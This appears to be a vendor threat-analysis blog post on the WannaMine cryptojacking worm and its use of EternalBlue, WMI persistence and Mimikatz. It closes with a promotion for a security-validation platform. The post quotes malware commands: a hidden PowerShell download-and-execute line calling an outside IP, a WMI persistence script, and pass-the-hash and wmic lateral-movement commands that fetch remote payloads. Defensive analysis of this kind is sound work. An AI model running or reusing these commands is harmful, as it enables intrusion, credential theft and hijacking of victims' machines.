WannaMine is a sophisticated, file-less cryptojacking worm that primarily utilizes "living-off-the-land" techniques to infect systems and mine Monero cryptocurrency. Unlike traditional malware that relies heavily on writing files to disk, WannaMine operates almost entirely within system memory, leveraging legitimate administrative tools such as PowerShell and Windows Management Instrumentation (WMI) to maintain persistence and execute malicious code.
The infection cycle typically begins via a phishing email containing a malicious batch file or through the exploitation of the EternalBlue vulnerability (MS17-010) on unpatched Server Message Block (SMB) services. Once a system is compromised, the malware establishes persistence by creating malicious WMI event subscriptions, ensuring it automatically re-executes even after a reboot [1].
To propagate across the network, WannaMine employs a multi-staged lateral movement strategy. It first attempts to harvest user credentials (specifically NTLM hashes) from memory using a PowerShell implementation of the Mimikatz tool. If credential theft is successful, it uses WMIExec to remotely execute commands on other networked devices. If credential harvesting fails, the malware falls back to the EternalBlue exploit to compromise vulnerable machines [2]. The ultimate goal is to hijack the CPU resources of infected servers and workstations to mine cryptocurrency, often rendering the devices unusable due to high processor usage.
WannaMine is characterized by its modular architecture and heavy reliance on WMI for both storage and execution. The attack chain involves initial access, persistence, credential harvesting, network scanning, and payload execution.
The attack often initiates through a malicious email attachment or an unpatched SMB vulnerability. Upon execution, the malware spawns a PowerShell process that determines the operating system's architecture (32-bit vs. 64-bit) to download the appropriate payload [1].
|
powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://45.199.154.147:8000/in6.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://45.199.154.147:8000/in3.ps1')}" |
To ensure the infection survives system reboots without leaving traditional file artifacts, WannaMine stores its malicious scripts directly within the WMI database properties. It creates specific WMI classes (e.g., systemcore_Updater, Office_Updater, Win32_Services) and populates their properties with encoded payloads.
The following properties contain the core modules of the malware [2]:
Persistence is triggered using WMI Event Consumers (e.g., SCM Event Log Consumer), which automatically run the stored PowerShell scripts when specific system events occur. Below is an example of a script that executes the cryptominer [1]:
|
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System <TRUNCATED> |
To identify viable targets, the malware utilizes code derived from the PingCastle scanner. This component maps the network and identifies the shortest path to exploitable machines via SMB.
WannaMine employs a dual-strategy for spreading to other hosts on the network:
The malware loads the mimi module (Mimikatz) into memory to extract NTLM hashes or clear-text passwords. If a Domain Administrator's hash is recovered, the malware utilizes Invoke-WMIExec to launch attacks against other IP addresses found on the network.
Examples of lateral movement commands using harvested credentials [2]:
|
Invoke-WMIExec Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 <<command>> wmic /NODE:"VIKAS-PC" /USER:"vikas.singh" PASSWORD:"MyPoorPassword" process call create "powershell.exe -Command {IEX (New- ObjectNet.Webclient).DownloadString('http://192.168.110.l41/Payload.psl')}" |
If credential-based movement fails, the malware utilizes the funs module to deploy the EternalBlue exploit against unpatched machines [2].
Once established, the malware configures the system for maximum mining efficiency. It alters power management settings to prevent the computer from entering sleep mode [1]:
|
C:\Windows\system32\powercfg.exe /CHANGE -standby-timeout-ac 0 |
The malware also actively eliminates competition. It scans for and terminates processes connected to standard mining ports (3333, 5555, 7777), while its own miner operates on port 14444 [1].
We also strongly suggest simulating WannaMine Malware Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the WannaMine Malware Attacks:
|
Threat ID |
Threat Name |
Attack Module |
|
39833 |
WannaMine Malware Campaign |
Windows Endpoint |
|
76122 |
WannaMine Trojan Email Threat |
E-mail Infiltration |
|
49678 |
WannaMine Trojan Download Threat |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] C. Nocturnus, “WannaMine Cryptominer that uses EternalBlue still active.” Accessed: Jan. 11, 2026. [Online]. Available: https://www.cybereason.com/blog/research/wannamine-cryptominer-eternalblue-wannacry
[2] “Service and Support.” Accessed: Jan. 11, 2026. [Online]. Available: https://support.sophos.com/support/s/article/KBA-000005976?language=en_US